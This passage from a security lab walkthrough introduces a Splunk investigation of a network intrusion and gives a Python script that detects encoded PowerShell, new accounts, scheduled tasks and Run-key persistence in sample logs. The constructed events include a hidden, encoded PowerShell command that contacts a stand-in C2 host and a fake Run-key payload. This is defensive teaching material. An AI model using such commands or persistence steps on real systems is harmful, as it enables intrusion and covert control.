This lab walkthrough analyzes a sophisticated cyber intrusion, uncovering the attacker's tactics, techniques, and procedures (TTPs) through forensic investigation. The scenario involves an adversary infiltrating a corporate network, establishing persistence, escalating privileges, and moving laterally across systems. By leveraging security event logs, including Windows Event Logs and Sysmon data, we will dissect the attack timeline and track the adversary's movements from initial compromise to command and control (C2) communications.
Through Splunk searches and log analysis, we will identify key indicators of compromise (IOCs), including malicious scheduled tasks, encoded PowerShell commands, registry modifications, and unauthorized user account creations. Additionally, we will investigate lateral movement techniques, persistence mechanisms, and the use of common attack frameworks. By the end of this walkthrough, we will have a stronger understanding of how threat actors operate within an enterprise environment and how we, as analysts, can leverage SIEM tools to detect and mitigate such intrusions. The lab emphasizes real-world detection and investigative techniques, reinforcing the importance of log analysis, threat hunting, and defensive strategies in cybersecurity.
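To make the detection goals above concrete before opening Splunk, here is an added Python example (not part of the lab and not the walkthrough's own searches) that applies the same checks to a handful of constructed Windows Security and Sysmon events: it decodes `-EncodedCommand` PowerShell arguments, flags new user accounts (Security 4720), scheduled task creation (Security 4698) and Run-key writes (Sysmon 13), and orders the hits into a timeline. The event dictionaries, their field names (`CommandLine`, `TargetObject`, `TaskName`, ...) and the `_enc` helper are assumptions chosen to resemble what a Splunk add-on would extract; all sample values are constructed.

```python
import base64
import re
from typing import Optional

# All events below are constructed for this example. Field names are assumed to
# mirror what a Splunk Windows/Sysmon add-on extracts; they are not copied from the lab.


def _enc(ps: str) -> str:
    """Encode a PowerShell command the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


SAMPLE_EVENTS = [
    {"_time": "2024-01-15T10:02:11", "source": "Sysmon", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _enc("Invoke-WebRequest -Uri http://c2.example.invalid/checkin")},
    {"_time": "2024-01-15T10:03:40", "source": "Security", "EventID": 4720,
     "TargetUserName": "svc_backup", "SubjectUserName": "jdoe"},
    {"_time": "2024-01-15T10:04:05", "source": "Security", "EventID": 4698,
     "TaskName": r"\Microsoft\Windows\Updater", "SubjectUserName": "jdoe"},
    {"_time": "2024-01-15T10:04:30", "source": "Sysmon", "EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\update.exe"},
    {"_time": "2024-01-15T10:05:00", "source": "Sysmon", "EventID": 1,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so a search for the literal "-EncodedCommand" alone misses most real usage.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run(?:Once)?\\")


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list:
    """Map one event to (finding, detail) pairs matching the IOC classes the walkthrough hunts for."""
    findings = []
    src, eid = event.get("source"), event.get("EventID")
    if src == "Sysmon" and eid == 1:                      # process creation
        decoded = decode_encoded_powershell(event.get("CommandLine", ""))
        if decoded is not None:
            findings.append(("encoded_powershell", decoded))
    elif src == "Security" and eid == 4720:               # user account created
        findings.append(("user_account_created",
                         f"{event['SubjectUserName']} created {event['TargetUserName']}"))
    elif src == "Security" and eid == 4698:               # scheduled task created
        findings.append(("scheduled_task_created", event["TaskName"]))
    elif src == "Sysmon" and eid == 13 and RUN_KEY.search(event.get("TargetObject", "")):
        findings.append(("run_key_persistence",          # registry value set under a Run key
                         f"{event['TargetObject']} = {event['Details']}"))
    return findings


def build_timeline(events: list) -> list:
    """Chronological (time, finding, detail) rows: the skeleton of an attack timeline."""
    rows = []
    for ev in sorted(events, key=lambda e: e["_time"]):
        for finding, detail in analyze_event(ev):
            rows.append((ev["_time"], finding, detail))
    return rows


if __name__ == "__main__":
    for t, finding, detail in build_timeline(SAMPLE_EVENTS):
        print(f"{t}  {finding:24}  {detail}")
```

Each branch of `analyze_event` corresponds to one Splunk search in the walkthrough (filter on source and EventID, then on a field pattern); the decode step is what turns an otherwise opaque base64 blob into something you can pivot on, such as the C2 host in the constructed sample.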
When